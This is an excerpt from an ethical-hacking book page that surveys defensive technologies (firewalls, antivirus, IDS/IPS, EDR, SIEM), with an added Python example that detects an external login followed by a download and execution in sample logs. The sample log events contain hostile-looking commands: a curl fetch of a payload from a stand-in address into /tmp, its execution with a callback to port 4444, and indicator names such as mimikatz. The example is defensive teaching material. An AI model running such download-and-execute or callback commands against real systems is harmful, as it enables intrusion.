Hands-On Ethical Hacking Tactics

You're reading from Hands-On Ethical Hacking Tactics: Strategies, tools, and techniques for effective cyber defense

Product type: Paperback
Published in: May 2024
Publisher: Packt
ISBN-13: 9781801810081
Length: 464 pages
Edition: 1st Edition
Author: Shane Hartman
Table of Contents

Preface
Part 1: Information Gathering and Reconnaissance
Chapter 1: Ethical Hacking Concepts
Chapter 2: Ethical Hacking Footprinting and Reconnaissance
Chapter 3: Ethical Hacking Scanning and Enumeration
Chapter 4: Ethical Hacking Vulnerability Assessments and Threat Modeling
Part 2: Hacking Tools and Techniques
Chapter 5: Hacking the Windows Operating System
Chapter 6: Hacking the Linux Operating System
Chapter 7: Ethical Hacking of Web Servers
Chapter 8: Hacking Databases
Chapter 9: Ethical Hacking Protocol Review
Chapter 10: Ethical Hacking for Malware Analysis
Part 3: Defense, Social Engineering, IoT, and Cloud
Chapter 11: Incident Response and Threat Hunting
Chapter 12: Social Engineering
Chapter 13: Ethical Hacking of the Internet of Things
Chapter 14: Ethical Hacking in the Cloud
Index
Other Books You May Enjoy

Defensive technologies

Defensive technologies include the software and devices used to thwart attackers. Some of these technologies are passive: they produce detections and alerts that require intervention by an analyst. Others are active: they use workflows or rules to decide on an action and carry it out without waiting for a human. Antivirus software is an example of an active technology: it acts on a detection by applying a rule, which in this case is typically to quarantine or delete the file. The following is a brief list of defensive technologies defenders can employ in the networks they are tasked to protect:

  • Firewalls: Often considered the first line of defense, firewalls, like other security technologies, have advanced over the years. They started as little more than routers with access control lists (ACLs), filtering each packet on its own against source, destination, and port. The next generation added the ability to track and maintain connection state, so that return traffic is permitted only for sessions the firewall has already seen. The latest iteration, the next-generation firewall (NGFW), goes beyond both by inspecting and understanding application behavior and applying intrusion prevention in line.
  • Antivirus (AV) software: Like firewalls, antivirus was one of the first technologies developed to combat malicious code, and it too has gone through several enhancements over the years. In the beginning, antivirus was simply a set of signature-based rules; once a signature matched, the system raised an alert and could delete the malicious file(s) for you. As the industry matured, later generations added heuristic detection and the inspection of applications such as browsers, and merged into larger suites of products that perform multiple security operations. The latest generation builds on those lessons and adds behavior detection for application and user interactions, rather than relying on signatures alone.
  • Intrusion detection system (IDS): Intrusion detection systems fall into two classifications. The first is the network intrusion detection system (NIDS), in which a device or sensor monitors network traffic and applies a set of detection rules to it. Some NIDSs can also act on the traffic they inspect, for example by dropping or resetting a matching connection; when this option is implemented, the device is referred to as an intrusion prevention system (IPS). The second type is the host intrusion detection system (HIDS), which, unlike a NIDS, runs on the monitored machine and watches host-level activity such as the file system, logs, and processes. Both share the same limitation: each sees only one vantage point, the wire or the host, and so only one or possibly two elements of any transaction between machines. They are still widely implemented; however, other, more capable technologies such as next-generation firewalls and EDR systems have largely supplanted this category of security system.
  • Endpoint detection and response (EDR): EDR systems are among the latest security tools introduced to enterprise security. The technology lives on the endpoint, be it a server or a workstation, as an installed agent. The agent collects telemetry such as process activity and network connections and reports it to a central repository, where the data is recorded and processed to build behavior profiles for applications and users alike. Those profiles can then be used to discover malicious behavior, either through automated alerts or through threat hunting.
  • Security information and event management (SIEM): A SIEM can be described as the go-between for network detection and EDR systems. It collects data from across the network, including logs, telemetry, and device information, and correlates it to give a more holistic view of the enterprise than any single sensor provides. One example of the insight a SIEM brings: if an attacker has gained access to a network and begins downloading tools and performing malicious activity, the individual events (a login from an unusual source, a download, a new process on the host) may each look benign to the sensor that recorded them, but the SIEM's rules and behavioral baselines can tie the sequence together and raise an alert to the appropriate security staff.
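The contrast between the signature-based detection of early antivirus and IDS and the behavioral correlation of EDR and SIEM can be made concrete with a small example. The following Python is an added example and not code from the book; it runs both detection approaches over a few constructed log events modelled on the SIEM scenario above (an external login, a tool download, then execution of the downloaded file). The trusted address ranges, the ten-minute correlation window, the list of downloader binaries, and the events themselves are all assumptions made for illustration.

```python
import ipaddress
import re
from datetime import datetime, timedelta

# Assumptions for the example (not from the book): the organisation's own address
# space, the correlation window, and which binaries count as "downloaders".
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.0.0/16")]
WINDOW = timedelta(minutes=10)
DOWNLOADERS = {"/usr/bin/curl", "/usr/bin/wget"}
STAGING_RE = re.compile(r"(?:^|\s)(/tmp/\S+|/dev/shm/\S+)")

# Constructed sample telemetry, already normalised the way a SIEM would store it:
# (timestamp, host, source, fields). web01 shows the attacker scenario from the
# text; web02 is benign admin activity that must not alert.
EVENTS = [
    ("2024-05-01T09:00:02", "web01", "sshd", {"event": "login_ok", "user": "deploy", "src_ip": "203.0.113.9"}),
    ("2024-05-01T09:00:40", "web01", "edr",  {"event": "process", "user": "deploy", "image": "/usr/bin/curl",
                                              "cmdline": "curl -o /tmp/.x http://203.0.113.9/agent"}),
    ("2024-05-01T09:01:05", "web01", "edr",  {"event": "process", "user": "deploy", "image": "/usr/bin/chmod",
                                              "cmdline": "chmod +x /tmp/.x"}),
    ("2024-05-01T09:01:07", "web01", "edr",  {"event": "process", "user": "deploy", "image": "/tmp/.x",
                                              "cmdline": "/tmp/.x -c 203.0.113.9:4444"}),
    ("2024-05-01T10:15:00", "web02", "sshd", {"event": "login_ok", "user": "ops", "src_ip": "10.0.0.5"}),
    ("2024-05-01T10:16:00", "web02", "edr",  {"event": "process", "user": "ops", "image": "/usr/bin/curl",
                                              "cmdline": "curl -s https://updates.example.internal/health"}),
]


def is_external(ip):
    """True when the address is outside the ranges we consider our own."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in TRUSTED_NETS)


def signature_alerts(events, iocs):
    """Signature-style detection: fires only when a known indicator appears verbatim."""
    alerts = []
    for ts, host, _src, fields in events:
        haystack = " ".join(str(v) for v in fields.values())
        for ioc in iocs:
            if ioc in haystack:
                alerts.append({"rule": "ioc-match", "ioc": ioc, "host": host, "time": ts})
    return alerts


def correlation_alerts(events, window=WINDOW):
    """Behavioural detection: external login -> download into a staging directory ->
    execution of that file, correlated per (host, user) inside `window`.
    It does not care what the tool is called or what its hash is."""
    state = {}   # (host, user) -> progress through the sequence
    alerts = []
    for ts, host, _src, fields in sorted(events, key=lambda e: e[0]):
        t = datetime.fromisoformat(ts)
        key = (host, fields.get("user"))
        stage = state.get(key, {})
        if fields["event"] == "login_ok":
            if is_external(fields["src_ip"]):
                state[key] = {"login": t, "src_ip": fields["src_ip"]}
            else:
                state.pop(key, None)   # trusted login: nothing to track
            continue
        if fields["event"] != "process" or "login" not in stage or t - stage["login"] > window:
            continue
        m = STAGING_RE.search(fields["cmdline"])
        if fields["image"] in DOWNLOADERS and m:
            stage.update(download=t, path=m.group(1))
        elif "download" in stage and fields["image"] == stage["path"] and t - stage["download"] <= window:
            alerts.append({"rule": "external-login-download-exec", "host": host, "user": key[1],
                           "src_ip": stage["src_ip"], "path": stage["path"], "time": ts})
            state.pop(key, None)
    return alerts


if __name__ == "__main__":
    print("signature :", signature_alerts(EVENTS, ["mimikatz", "cobaltstrike"]))
    print("behaviour :", correlation_alerts(EVENTS))
```

The signature rule finds nothing because the dropped tool has no known name or hash to match, while the correlation rule fires on the sequence itself; the admin activity on web02 stays quiet because its login came from a trusted range. A real SIEM or EDR expresses the same logic in its own rule language, but the distinction between matching what an attacker brings and matching what an attacker does is exactly the one the list above draws.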

Now, to begin your journey into ethical hacking, let’s start by creating a lab environment in which we can test and explore.
